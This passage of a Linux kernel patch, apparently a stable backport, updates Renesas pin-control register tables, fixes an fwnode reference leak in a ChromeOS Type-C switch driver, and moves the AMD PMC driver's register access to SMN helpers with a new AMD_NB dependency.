++	PINMUX_IPSR_GPSR(IP1SR5_19_16,	AVB2_TD1),
++	PINMUX_IPSR_GPSR(IP1SR5_23_20,	AVB2_RD2),
++	PINMUX_IPSR_GPSR(IP1SR5_27_24,	AVB2_RD1),
++	PINMUX_IPSR_GPSR(IP1SR5_31_28,	AVB2_TD0),
++
++	/* IP2SR5 */
++	PINMUX_IPSR_GPSR(IP2SR5_3_0,	AVB2_TXC),
++	PINMUX_IPSR_GPSR(IP2SR5_7_4,	AVB2_RD0),
++	PINMUX_IPSR_GPSR(IP2SR5_11_8,	AVB2_RXC),
++	PINMUX_IPSR_GPSR(IP2SR5_15_12,	AVB2_TX_CTL),
++	PINMUX_IPSR_GPSR(IP2SR5_19_16,	AVB2_RX_CTL),
++
+ 	/* IP0SR6 */
+ 	PINMUX_IPSR_GPSR(IP0SR6_3_0,	AVB1_MDIO),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR6_7_4,	AVB1_MAGIC,		SEL_AVB1_MAGIC_1),
++	PINMUX_IPSR_GPSR(IP0SR6_7_4,	AVB1_MAGIC),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR6_11_8,	AVB1_MDC,		SEL_AVB1_MDC_1),
++	PINMUX_IPSR_GPSR(IP0SR6_11_8,	AVB1_MDC),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR6_15_12,	AVB1_PHY_INT),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR6_19_16,	AVB1_LINK),
+ 	PINMUX_IPSR_GPSR(IP0SR6_19_16,	AVB1_MII_TX_ER),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR6_23_20,	AVB1_AVTP_MATCH,	SEL_AVB1_AVTP_MATCH_1),
+-	PINMUX_IPSR_MSEL(IP0SR6_23_20,	AVB1_MII_RX_ER,		SEL_AVB1_AVTP_MATCH_0),
++	PINMUX_IPSR_GPSR(IP0SR6_23_20,	AVB1_AVTP_MATCH),
++	PINMUX_IPSR_GPSR(IP0SR6_23_20,	AVB1_MII_RX_ER),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR6_27_24,	AVB1_TXC,		SEL_AVB1_TXC_1),
+-	PINMUX_IPSR_MSEL(IP0SR6_27_24,	AVB1_MII_TXC,		SEL_AVB1_TXC_0),
++	PINMUX_IPSR_GPSR(IP0SR6_27_24,	AVB1_TXC),
++	PINMUX_IPSR_GPSR(IP0SR6_27_24,	AVB1_MII_TXC),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR6_31_28,	AVB1_TX_CTL,		SEL_AVB1_TX_CTL_1),
+-	PINMUX_IPSR_MSEL(IP0SR6_31_28,	AVB1_MII_TX_EN,		SEL_AVB1_TX_CTL_0),
++	PINMUX_IPSR_GPSR(IP0SR6_31_28,	AVB1_TX_CTL),
++	PINMUX_IPSR_GPSR(IP0SR6_31_28,	AVB1_MII_TX_EN),
+ 
+ 	/* IP1SR6 */
+ 	PINMUX_IPSR_GPSR(IP1SR6_3_0,	AVB1_RXC),
+@@ -1057,17 +1088,17 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_IPSR_GPSR(IP1SR6_7_4,	AVB1_RX_CTL),
+ 	PINMUX_IPSR_GPSR(IP1SR6_7_4,	AVB1_MII_RX_DV),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR6_11_8,	AVB1_AVTP_PPS,		SEL_AVB1_AVTP_PPS_1),
+-	PINMUX_IPSR_MSEL(IP1SR6_11_8,	AVB1_MII_COL,		SEL_AVB1_AVTP_PPS_0),
++	PINMUX_IPSR_GPSR(IP1SR6_11_8,	AVB1_AVTP_PPS),
++	PINMUX_IPSR_GPSR(IP1SR6_11_8,	AVB1_MII_COL),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR6_15_12,	AVB1_AVTP_CAPTURE),
+ 	PINMUX_IPSR_GPSR(IP1SR6_15_12,	AVB1_MII_CRS),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR6_19_16,	AVB1_TD1,		SEL_AVB1_TD1_1),
+-	PINMUX_IPSR_MSEL(IP1SR6_19_16,	AVB1_MII_TD1,		SEL_AVB1_TD1_0),
++	PINMUX_IPSR_GPSR(IP1SR6_19_16,	AVB1_TD1),
++	PINMUX_IPSR_GPSR(IP1SR6_19_16,	AVB1_MII_TD1),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR6_23_20,	AVB1_TD0,		SEL_AVB1_TD0_1),
+-	PINMUX_IPSR_MSEL(IP1SR6_23_20,	AVB1_MII_TD0,		SEL_AVB1_TD0_0),
++	PINMUX_IPSR_GPSR(IP1SR6_23_20,	AVB1_TD0),
++	PINMUX_IPSR_GPSR(IP1SR6_23_20,	AVB1_MII_TD0),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR6_27_24,	AVB1_RD1),
+ 	PINMUX_IPSR_GPSR(IP1SR6_27_24,	AVB1_MII_RD1),
+@@ -1076,14 +1107,14 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_IPSR_GPSR(IP1SR6_31_28,	AVB1_MII_RD0),
+ 
+ 	/* IP2SR6 */
+-	PINMUX_IPSR_MSEL(IP2SR6_3_0,	AVB1_TD2,		SEL_AVB1_TD2_1),
+-	PINMUX_IPSR_MSEL(IP2SR6_3_0,	AVB1_MII_TD2,		SEL_AVB1_TD2_0),
++	PINMUX_IPSR_GPSR(IP2SR6_3_0,	AVB1_TD2),
++	PINMUX_IPSR_GPSR(IP2SR6_3_0,	AVB1_MII_TD2),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR6_7_4,	AVB1_RD2),
+ 	PINMUX_IPSR_GPSR(IP2SR6_7_4,	AVB1_MII_RD2),
+ 
+-	PINMUX_IPSR_MSEL(IP2SR6_11_8,	AVB1_TD3,		SEL_AVB1_TD3_1),
+-	PINMUX_IPSR_MSEL(IP2SR6_11_8,	AVB1_MII_TD3,		SEL_AVB1_TD3_0),
++	PINMUX_IPSR_GPSR(IP2SR6_11_8,	AVB1_TD3),
++	PINMUX_IPSR_GPSR(IP2SR6_11_8,	AVB1_MII_TD3),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR6_15_12,	AVB1_RD3),
+ 	PINMUX_IPSR_GPSR(IP2SR6_15_12,	AVB1_MII_RD3),
+@@ -1091,29 +1122,29 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_IPSR_GPSR(IP2SR6_19_16,	AVB1_TXCREFCLK),
+ 
+ 	/* IP0SR7 */
+-	PINMUX_IPSR_MSEL(IP0SR7_3_0,	AVB0_AVTP_PPS,		SEL_AVB0_AVTP_PPS_1),
+-	PINMUX_IPSR_MSEL(IP0SR7_3_0,	AVB0_MII_COL,		SEL_AVB0_AVTP_PPS_0),
++	PINMUX_IPSR_GPSR(IP0SR7_3_0,	AVB0_AVTP_PPS),
++	PINMUX_IPSR_GPSR(IP0SR7_3_0,	AVB0_MII_COL),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR7_7_4,	AVB0_AVTP_CAPTURE),
+ 	PINMUX_IPSR_GPSR(IP0SR7_7_4,	AVB0_MII_CRS),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR7_11_8,	AVB0_AVTP_MATCH,	SEL_AVB0_AVTP_MATCH_1),
+-	PINMUX_IPSR_MSEL(IP0SR7_11_8,	AVB0_MII_RX_ER,		SEL_AVB0_AVTP_MATCH_0),
+-	PINMUX_IPSR_MSEL(IP0SR7_11_8,	CC5_OSCOUT,		SEL_AVB0_AVTP_MATCH_0),
++	PINMUX_IPSR_GPSR(IP0SR7_11_8,	AVB0_AVTP_MATCH),
++	PINMUX_IPSR_GPSR(IP0SR7_11_8,	AVB0_MII_RX_ER),
++	PINMUX_IPSR_GPSR(IP0SR7_11_8,	CC5_OSCOUT),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR7_15_12,	AVB0_TD3,		SEL_AVB0_TD3_1),
+-	PINMUX_IPSR_MSEL(IP0SR7_15_12,	AVB0_MII_TD3,		SEL_AVB0_TD3_0),
++	PINMUX_IPSR_GPSR(IP0SR7_15_12,	AVB0_TD3),
++	PINMUX_IPSR_GPSR(IP0SR7_15_12,	AVB0_MII_TD3),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR7_19_16,	AVB0_LINK),
+ 	PINMUX_IPSR_GPSR(IP0SR7_19_16,	AVB0_MII_TX_ER),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR7_23_20,	AVB0_PHY_INT),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR7_27_24,	AVB0_TD2,		SEL_AVB0_TD2_1),
+-	PINMUX_IPSR_MSEL(IP0SR7_27_24,	AVB0_MII_TD2,		SEL_AVB0_TD2_0),
++	PINMUX_IPSR_GPSR(IP0SR7_27_24,	AVB0_TD2),
++	PINMUX_IPSR_GPSR(IP0SR7_27_24,	AVB0_MII_TD2),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR7_31_28,	AVB0_TD1,		SEL_AVB0_TD1_1),
+-	PINMUX_IPSR_MSEL(IP0SR7_31_28,	AVB0_MII_TD1,		SEL_AVB0_TD1_0),
++	PINMUX_IPSR_GPSR(IP0SR7_31_28,	AVB0_TD1),
++	PINMUX_IPSR_GPSR(IP0SR7_31_28,	AVB0_MII_TD1),
+ 
+ 	/* IP1SR7 */
+ 	PINMUX_IPSR_GPSR(IP1SR7_3_0,	AVB0_RD3),
+@@ -1121,24 +1152,24 @@ static const u16 pinmux_data[] = {
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR7_7_4,	AVB0_TXCREFCLK),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR7_11_8,	AVB0_MAGIC,		SEL_AVB0_MAGIC_1),
++	PINMUX_IPSR_GPSR(IP1SR7_11_8,	AVB0_MAGIC),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR7_15_12,	AVB0_TD0,		SEL_AVB0_TD0_1),
+-	PINMUX_IPSR_MSEL(IP1SR7_15_12,	AVB0_MII_TD0,		SEL_AVB0_TD0_0),
++	PINMUX_IPSR_GPSR(IP1SR7_15_12,	AVB0_TD0),
++	PINMUX_IPSR_GPSR(IP1SR7_15_12,	AVB0_MII_TD0),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR7_19_16,	AVB0_RD2),
+ 	PINMUX_IPSR_GPSR(IP1SR7_19_16,	AVB0_MII_RD2),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR7_23_20,	AVB0_MDC,		SEL_AVB0_MDC_1),
++	PINMUX_IPSR_GPSR(IP1SR7_23_20,	AVB0_MDC),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR7_27_24,	AVB0_MDIO),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR7_31_28,	AVB0_TXC,		SEL_AVB0_TXC_1),
+-	PINMUX_IPSR_MSEL(IP1SR7_31_28,	AVB0_MII_TXC,		SEL_AVB0_TXC_0),
++	PINMUX_IPSR_GPSR(IP1SR7_31_28,	AVB0_TXC),
++	PINMUX_IPSR_GPSR(IP1SR7_31_28,	AVB0_MII_TXC),
+ 
+ 	/* IP2SR7 */
+-	PINMUX_IPSR_MSEL(IP2SR7_3_0,	AVB0_TX_CTL,		SEL_AVB0_TX_CTL_1),
+-	PINMUX_IPSR_MSEL(IP2SR7_3_0,	AVB0_MII_TX_EN,		SEL_AVB0_TX_CTL_0),
++	PINMUX_IPSR_GPSR(IP2SR7_3_0,	AVB0_TX_CTL),
++	PINMUX_IPSR_GPSR(IP2SR7_3_0,	AVB0_MII_TX_EN),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR7_7_4,	AVB0_RD1),
+ 	PINMUX_IPSR_GPSR(IP2SR7_7_4,	AVB0_MII_RD1),
+@@ -3419,6 +3450,82 @@ static const struct pinmux_cfg_reg pinmux_config_regs[] = {
+ 		IP3SR3_7_4
+ 		IP3SR3_3_0))
+ 	},
++	{ PINMUX_CFG_REG_VAR("IP0SR4", 0xE6060060, 32,
++			     GROUP(4, 4, 4, 4, 4, 4, 4, 4),
++			     GROUP(
++		IP0SR4_31_28
++		IP0SR4_27_24
++		IP0SR4_23_20
++		IP0SR4_19_16
++		IP0SR4_15_12
++		IP0SR4_11_8
++		IP0SR4_7_4
++		IP0SR4_3_0))
++	},
++	{ PINMUX_CFG_REG_VAR("IP1SR4", 0xE6060064, 32,
++			     GROUP(4, 4, 4, 4, 4, 4, 4, 4),
++			     GROUP(
++		IP1SR4_31_28
++		IP1SR4_27_24
++		IP1SR4_23_20
++		IP1SR4_19_16
++		IP1SR4_15_12
++		IP1SR4_11_8
++		IP1SR4_7_4
++		IP1SR4_3_0))
++	},
++	{ PINMUX_CFG_REG_VAR("IP2SR4", 0xE6060068, 32,
++			     GROUP(4, 4, 4, 4, 4, 4, 4, 4),
++			     GROUP(
++		IP2SR4_31_28
++		IP2SR4_27_24
++		IP2SR4_23_20
++		IP2SR4_19_16
++		IP2SR4_15_12
++		IP2SR4_11_8
++		IP2SR4_7_4
++		IP2SR4_3_0))
++	},
++	{ PINMUX_CFG_REG_VAR("IP3SR4", 0xE606006C, 32,
++			     GROUP(-28, 4),
++			     GROUP(
++		/* IP3SR4_31_4 RESERVED */
++		IP3SR4_3_0))
++	},
++	{ PINMUX_CFG_REG_VAR("IP0SR5", 0xE6060860, 32,
++			     GROUP(4, 4, 4, 4, 4, 4, 4, 4),
++			     GROUP(
++		IP0SR5_31_28
++		IP0SR5_27_24
++		IP0SR5_23_20
++		IP0SR5_19_16
++		IP0SR5_15_12
++		IP0SR5_11_8
++		IP0SR5_7_4
++		IP0SR5_3_0))
++	},
++	{ PINMUX_CFG_REG_VAR("IP1SR5", 0xE6060864, 32,
++			     GROUP(4, 4, 4, 4, 4, 4, 4, 4),
++			     GROUP(
++		IP1SR5_31_28
++		IP1SR5_27_24
++		IP1SR5_23_20
++		IP1SR5_19_16
++		IP1SR5_15_12
++		IP1SR5_11_8
++		IP1SR5_7_4
++		IP1SR5_3_0))
++	},
++	{ PINMUX_CFG_REG_VAR("IP2SR5", 0xE6060868, 32,
++			     GROUP(-12, 4, 4, 4, 4, 4),
++			     GROUP(
++		/* IP2SR5_31_20 RESERVED */
++		IP2SR5_19_16
++		IP2SR5_15_12
++		IP2SR5_11_8
++		IP2SR5_7_4
++		IP2SR5_3_0))
++	},
+ 	{ PINMUX_CFG_REG("IP0SR6", 0xE6061060, 32, 4, GROUP(
+ 		IP0SR6_31_28
+ 		IP0SR6_27_24
+@@ -3505,95 +3612,6 @@ static const struct pinmux_cfg_reg pinmux_config_regs[] = {
+ 
+ #define F_(x, y)	x,
+ #define FM(x)		FN_##x,
+-	{ PINMUX_CFG_REG_VAR("MOD_SEL4", 0xE6060100, 32,
+-			     GROUP(-12, 1, 1, -2, 1, 1, -1, 1, -2, 1, 1, -2, 1,
+-				   -2, 1, 1, -1),
+-			     GROUP(
+-		/* RESERVED 31-20 */
+-		MOD_SEL4_19
+-		MOD_SEL4_18
+-		/* RESERVED 17-16 */
+-		MOD_SEL4_15
+-		MOD_SEL4_14
+-		/* RESERVED 13 */
+-		MOD_SEL4_12
+-		/* RESERVED 11-10 */
+-		MOD_SEL4_9
+-		MOD_SEL4_8
+-		/* RESERVED 7-6 */
+-		MOD_SEL4_5
+-		/* RESERVED 4-3 */
+-		MOD_SEL4_2
+-		MOD_SEL4_1
+-		/* RESERVED 0 */
+-		))
+-	},
+-	{ PINMUX_CFG_REG_VAR("MOD_SEL5", 0xE6060900, 32,
+-			     GROUP(-12, 1, -2, 1, 1, -2, 1, 1, -2, 1, -1,
+-				   1, 1, -2, 1, -1, 1),
+-			     GROUP(
+-		/* RESERVED 31-20 */
+-		MOD_SEL5_19
+-		/* RESERVED 18-17 */
+-		MOD_SEL5_16
+-		MOD_SEL5_15
+-		/* RESERVED 14-13 */
+-		MOD_SEL5_12
+-		MOD_SEL5_11
+-		/* RESERVED 10-9 */
+-		MOD_SEL5_8
+-		/* RESERVED 7 */
+-		MOD_SEL5_6
+-		MOD_SEL5_5
+-		/* RESERVED 4-3 */
+-		MOD_SEL5_2
+-		/* RESERVED 1 */
+-		MOD_SEL5_0))
+-	},
+-	{ PINMUX_CFG_REG_VAR("MOD_SEL6", 0xE6061100, 32,
+-			     GROUP(-13, 1, -1, 1, -2, 1, 1,
+-				   -1, 1, -2, 1, 1, 1, -2, 1, 1, -1),
+-			     GROUP(
+-		/* RESERVED 31-19 */
+-		MOD_SEL6_18
+-		/* RESERVED 17 */
+-		MOD_SEL6_16
+-		/* RESERVED 15-14 */
+-		MOD_SEL6_13
+-		MOD_SEL6_12
+-		/* RESERVED 11 */
+-		MOD_SEL6_10
+-		/* RESERVED 9-8 */
+-		MOD_SEL6_7
+-		MOD_SEL6_6
+-		MOD_SEL6_5
+-		/* RESERVED 4-3 */
+-		MOD_SEL6_2
+-		MOD_SEL6_1
+-		/* RESERVED 0 */
+-		))
+-	},
+-	{ PINMUX_CFG_REG_VAR("MOD_SEL7", 0xE6061900, 32,
+-			     GROUP(-15, 1, 1, -1, 1, -1, 1, 1, -2, 1, 1,
+-				   -2, 1, 1, -1, 1),
+-			     GROUP(
+-		/* RESERVED 31-17 */
+-		MOD_SEL7_16
+-		MOD_SEL7_15
+-		/* RESERVED 14 */
+-		MOD_SEL7_13
+-		/* RESERVED 12 */
+-		MOD_SEL7_11
+-		MOD_SEL7_10
+-		/* RESERVED 9-8 */
+-		MOD_SEL7_7
+-		MOD_SEL7_6
+-		/* RESERVED 5-4 */
+-		MOD_SEL7_3
+-		MOD_SEL7_2
+-		/* RESERVED 1 */
+-		MOD_SEL7_0))
+-	},
+ 	{ PINMUX_CFG_REG_VAR("MOD_SEL8", 0xE6068100, 32,
+ 			     GROUP(-20, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1),
+ 			     GROUP(
+diff --git a/drivers/platform/chrome/cros_typec_switch.c b/drivers/platform/chrome/cros_typec_switch.c
+index a26219e97c931..26af51952f7f1 100644
+--- a/drivers/platform/chrome/cros_typec_switch.c
++++ b/drivers/platform/chrome/cros_typec_switch.c
+@@ -268,6 +268,7 @@ static int cros_typec_register_switches(struct cros_typec_switch_data *sdata)
+ 
+ 	return 0;
+ err_switch:
++	fwnode_handle_put(fwnode);
+ 	cros_typec_unregister_switches(sdata);
+ 	return ret;
+ }
+diff --git a/drivers/platform/x86/amd/Kconfig b/drivers/platform/x86/amd/Kconfig
+index 2ce8cb2170dfc..d9685aef0887d 100644
+--- a/drivers/platform/x86/amd/Kconfig
++++ b/drivers/platform/x86/amd/Kconfig
+@@ -7,7 +7,7 @@ source "drivers/platform/x86/amd/pmf/Kconfig"
+ 
+ config AMD_PMC
+ 	tristate "AMD SoC PMC driver"
+-	depends on ACPI && PCI && RTC_CLASS
++	depends on ACPI && PCI && RTC_CLASS && AMD_NB
+ 	select SERIO
+ 	help
+ 	  The driver provides support for AMD Power Management Controller
+diff --git a/drivers/platform/x86/amd/pmc.c b/drivers/platform/x86/amd/pmc.c
+index be1b49824edbd..eb9fc6cb13e33 100644
+--- a/drivers/platform/x86/amd/pmc.c
++++ b/drivers/platform/x86/amd/pmc.c
+@@ -10,6 +10,7 @@
+ 
+ #define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+ 
++#include <asm/amd_nb.h>
+ #include <linux/acpi.h>
+ #include <linux/bitfield.h>
+ #include <linux/bits.h>
+@@ -37,8 +38,6 @@
+ #define AMD_PMC_SCRATCH_REG_YC		0xD14
+ 
+ /* STB Registers */
+-#define AMD_PMC_STB_INDEX_ADDRESS	0xF8
+-#define AMD_PMC_STB_INDEX_DATA		0xFC
+ #define AMD_PMC_STB_PMI_0		0x03E30600
+ #define AMD_PMC_STB_S2IDLE_PREPARE	0xC6000001
+ #define AMD_PMC_STB_S2IDLE_RESTORE	0xC6000002
+@@ -55,8 +54,6 @@
+ #define S2D_TELEMETRY_DRAMBYTES_MAX	0x1000000
+ 
+ /* Base address of SMU for mapping physical address to virtual address */
+-#define AMD_PMC_SMU_INDEX_ADDRESS	0xB8
+-#define AMD_PMC_SMU_INDEX_DATA		0xBC
+ #define AMD_PMC_MAPPING_SIZE		0x01000
+ #define AMD_PMC_BASE_ADDR_OFFSET	0x10000
+ #define AMD_PMC_BASE_ADDR_LO		0x13B102E8
+@@ -310,33 +307,6 @@ static int amd_pmc_setup_smu_logging(struct amd_pmc_dev *dev)
+ 	return 0;
+ }
+ 
+-static int amd_pmc_idlemask_read(struct amd_pmc_dev *pdev, struct device *dev,
+-				 struct seq_file *s)
+-{
+-	u32 val;
+-
+-	switch (pdev->cpu_id) {
+-	case AMD_CPU_ID_CZN:
+-		val = amd_pmc_reg_read(pdev, AMD_PMC_SCRATCH_REG_CZN);
+-		break;
+-	case AMD_CPU_ID_YC:
+-	case AMD_CPU_ID_CB:
+-	case AMD_CPU_ID_PS:
+-		val = amd_pmc_reg_read(pdev, AMD_PMC_SCRATCH_REG_YC);
+-		break;
+-	default:
+-		return -EINVAL;
+-	}
+-
+-	if (dev)
+-		dev_dbg(pdev->dev, "SMU idlemask s0i3: 0x%x\n", val);
+-
+-	if (s)
+-		seq_printf(s, "SMU idlemask : 0x%x\n", val);
+-
+-	return 0;
+-}
+-
+ static int get_metrics_table(struct amd_pmc_dev *pdev, struct smu_metrics *table)
+ {
+ 	if (!pdev->smu_virt_addr) {
+@@ -373,6 +343,9 @@ static int amd_pmc_get_smu_version(struct amd_pmc_dev *dev)
+ 	int rc;
+ 	u32 val;
+ 
++	if (dev->cpu_id == AMD_CPU_ID_PCO)
++		return -ENODEV;
++
+ 	rc = amd_pmc_send_cmd(dev, 0, &val, SMU_MSG_GETSMUVERSION, 1);
+ 	if (rc)
+ 		return rc;
+@@ -419,12 +392,31 @@ static ssize_t smu_program_show(struct device *d, struct device_attribute *attr,
+ static DEVICE_ATTR_RO(smu_fw_version);
+ static DEVICE_ATTR_RO(smu_program);
+ 
++static umode_t pmc_attr_is_visible(struct kobject *kobj, struct attribute *attr, int idx)
++{
++	struct device *dev = kobj_to_dev(kobj);
++	struct amd_pmc_dev *pdev = dev_get_drvdata(dev);
++
++	if (pdev->cpu_id == AMD_CPU_ID_PCO)
++		return 0;
++	return 0444;
++}
++
+ static struct attribute *pmc_attrs[] = {
+ 	&dev_attr_smu_fw_version.attr,
+ 	&dev_attr_smu_program.attr,
+ 	NULL,
+ };
+-ATTRIBUTE_GROUPS(pmc);
++
++static struct attribute_group pmc_attr_group = {
++	.attrs = pmc_attrs,
++	.is_visible = pmc_attr_is_visible,
++};
++
++static const struct attribute_group *pmc_groups[] = {
++	&pmc_attr_group,
++	NULL,
++};
+ 
+ static int smu_fw_info_show(struct seq_file *s, void *unused)
+ {
+@@ -491,28 +483,47 @@ static int s0ix_stats_show(struct seq_file *s, void *unused)
+ }
+ DEFINE_SHOW_ATTRIBUTE(s0ix_stats);
+ 
+-static int amd_pmc_idlemask_show(struct seq_file *s, void *unused)
++static int amd_pmc_idlemask_read(struct amd_pmc_dev *pdev, struct device *dev,
++				 struct seq_file *s)
+ {
+-	struct amd_pmc_dev *dev = s->private;
++	u32 val;
+ 	int rc;
+ 
+-	/* we haven't yet read SMU version */
+-	if (!dev->major) {
+-		rc = amd_pmc_get_smu_version(dev);
+-		if (rc)
+-			return rc;
++	switch (pdev->cpu_id) {
++	case AMD_CPU_ID_CZN:
++		/* we haven't yet read SMU version */
++		if (!pdev->major) {
++			rc = amd_pmc_get_smu_version(pdev);
++			if (rc)
++				return rc;
++		}
++		if (pdev->major > 56 || (pdev->major >= 55 && pdev->minor >= 37))
++			val = amd_pmc_reg_read(pdev, AMD_PMC_SCRATCH_REG_CZN);
++		else
++			return -EINVAL;
++		break;
++	case AMD_CPU_ID_YC:
++	case AMD_CPU_ID_CB:
++	case AMD_CPU_ID_PS:
++		val = amd_pmc_reg_read(pdev, AMD_PMC_SCRATCH_REG_YC);
++		break;
++	default:
++		return -EINVAL;
+ 	}
+ 
+-	if (dev->major > 56 || (dev->major >= 55 && dev->minor >= 37)) {
+-		rc = amd_pmc_idlemask_read(dev, NULL, s);
+-		if (rc)
+-			return rc;
+-	} else {
+-		seq_puts(s, "Unsupported SMU version for Idlemask\n");
+-	}
++	if (dev)
++		dev_dbg(pdev->dev, "SMU idlemask s0i3: 0x%x\n", val);
++
++	if (s)
++		seq_printf(s, "SMU idlemask : 0x%x\n", val);
+ 
+ 	return 0;
+ }
++
++static int amd_pmc_idlemask_show(struct seq_file *s, void *unused)
++{
++	return amd_pmc_idlemask_read(s->private, NULL, s);
++}
+ DEFINE_SHOW_ATTRIBUTE(amd_pmc_idlemask);
+ 
+ static void amd_pmc_dbgfs_unregister(struct amd_pmc_dev *dev)
+@@ -783,6 +794,14 @@ static void amd_pmc_s2idle_check(void)
+ 		dev_err(pdev->dev, "error writing to STB: %d\n", rc);
+ }
+ 
++static int amd_pmc_dump_data(struct amd_pmc_dev *pdev)
++{
++	if (pdev->cpu_id == AMD_CPU_ID_PCO)
++		return -ENODEV;
++
++	return amd_pmc_send_cmd(pdev, 0, NULL, SMU_MSG_LOG_DUMP_DATA, 0);
++}
++
+ static void amd_pmc_s2idle_restore(void)
+ {
+ 	struct amd_pmc_dev *pdev = &pmc;
+@@ -795,7 +814,7 @@ static void amd_pmc_s2idle_restore(void)
+ 		dev_err(pdev->dev, "resume failed: %d\n", rc);
+ 
+ 	/* Let SMU know that we are looking for stats */
+-	amd_pmc_send_cmd(pdev, 0, NULL, SMU_MSG_LOG_DUMP_DATA, 0);
++	amd_pmc_dump_data(pdev);
+ 
+ 	rc = amd_pmc_write_stb(pdev, AMD_PMC_STB_S2IDLE_RESTORE);
+ 	if (rc)
+@@ -876,17 +895,9 @@ static int amd_pmc_write_stb(struct amd_pmc_dev *dev, u32 data)
+ {
+ 	int err;
+ 
+-	err = pci_write_config_dword(dev->rdev, AMD_PMC_STB_INDEX_ADDRESS, AMD_PMC_STB_PMI_0);
++	err = amd_smn_write(0, AMD_PMC_STB_PMI_0, data);
+ 	if (err) {
+-		dev_err(dev->dev, "failed to write addr in stb: 0x%X\n",
+-			AMD_PMC_STB_INDEX_ADDRESS);
+-		return pcibios_err_to_errno(err);
+-	}
+-
+-	err = pci_write_config_dword(dev->rdev, AMD_PMC_STB_INDEX_DATA, data);
+-	if (err) {
+-		dev_err(dev->dev, "failed to write data in stb: 0x%X\n",
+-			AMD_PMC_STB_INDEX_DATA);
++		dev_err(dev->dev, "failed to write data in stb: 0x%X\n", AMD_PMC_STB_PMI_0);
+ 		return pcibios_err_to_errno(err);
+ 	}
+ 
+@@ -898,18 +909,10 @@ static int amd_pmc_read_stb(struct amd_pmc_dev *dev, u32 *buf)
+ {
+ 	int i, err;
+ 
+-	err = pci_write_config_dword(dev->rdev, AMD_PMC_STB_INDEX_ADDRESS, AMD_PMC_STB_PMI_0);
+-	if (err) {
+-		dev_err(dev->dev, "error writing addr to stb: 0x%X\n",
+-			AMD_PMC_STB_INDEX_ADDRESS);
+-		return pcibios_err_to_errno(err);
+-	}
+-
+ 	for (i = 0; i < FIFO_SIZE; i++) {
+-		err = pci_read_config_dword(dev->rdev, AMD_PMC_STB_INDEX_DATA, buf++);
++		err = amd_smn_read(0, AMD_PMC_STB_PMI_0, buf++);
+ 		if (err) {
+-			dev_err(dev->dev, "error reading data from stb: 0x%X\n",
+-				AMD_PMC_STB_INDEX_DATA);
++			dev_err(dev->dev, "error reading data from stb: 0x%X\n", AMD_PMC_STB_PMI_0);
+ 			return pcibios_err_to_errno(err);
+ 		}
+ 	}
+@@ -936,30 +939,18 @@ static int amd_pmc_probe(struct platform_device *pdev)
+ 
+ 	dev->cpu_id = rdev->device;
+ 	dev->rdev = rdev;
+-	err = pci_write_config_dword(rdev, AMD_PMC_SMU_INDEX_ADDRESS, AMD_PMC_BASE_ADDR_LO);
+-	if (err) {
+-		dev_err(dev->dev, "error writing to 0x%x\n", AMD_PMC_SMU_INDEX_ADDRESS);
+-		err = pcibios_err_to_errno(err);
+-		goto err_pci_dev_put;
+-	}
+-
+-	err = pci_read_config_dword(rdev, AMD_PMC_SMU_INDEX_DATA, &val);
++	err = amd_smn_read(0, AMD_PMC_BASE_ADDR_LO, &val);
+ 	if (err) {
++		dev_err(dev->dev, "error reading 0x%x\n", AMD_PMC_BASE_ADDR_LO);
+ 		err = pcibios_err_to_errno(err);
+ 		goto err_pci_dev_put;
+ 	}
+ 
+ 	base_addr_lo = val & AMD_PMC_BASE_ADDR_HI_MASK;
+ 
+-	err = pci_write_config_dword(rdev, AMD_PMC_SMU_INDEX_ADDRESS, AMD_PMC_BASE_ADDR_HI);
+-	if (err) {
+-		dev_err(dev->dev, "error writing to 0x%x\n", AMD_PMC_SMU_INDEX_ADDRESS);
+-		err = pcibios_err_to_errno(err);
+-		goto err_pci_dev_put;
+-	}
+-
+-	err = pci_read_config_dword(rdev, AMD_PMC_SMU_INDEX_DATA, &val);
++	err = amd_smn_read(0, AMD_PMC_BASE_ADDR_HI, &val);
+ 	if (err) {
++		dev_err(dev->dev, "error reading 0x%x\n", AMD_PMC_BASE_ADDR_HI);
+ 		err = pcibios_err_to_errno(err);
+ 		goto err_pci_dev_put;
+ 	}
+diff --git a/drivers/platform/x86/amd/pmf/Kconfig b/drivers/platform/x86/amd/pmf/Kconfig
+index 6d89528c31779..d87986adf91e1 100644
+--- a/drivers/platform/x86/amd/pmf/Kconfig
++++ b/drivers/platform/x86/amd/pmf/Kconfig
+@@ -7,6 +7,7 @@ config AMD_PMF
+ 	tristate "AMD Platform Management Framework"
+ 	depends on ACPI && PCI
+ 	depends on POWER_SUPPLY
++	depends on AMD_NB
+ 	select ACPI_PLATFORM_PROFILE
+ 	help
+ 	  This driver provides support for the AMD Platform Management Framework.
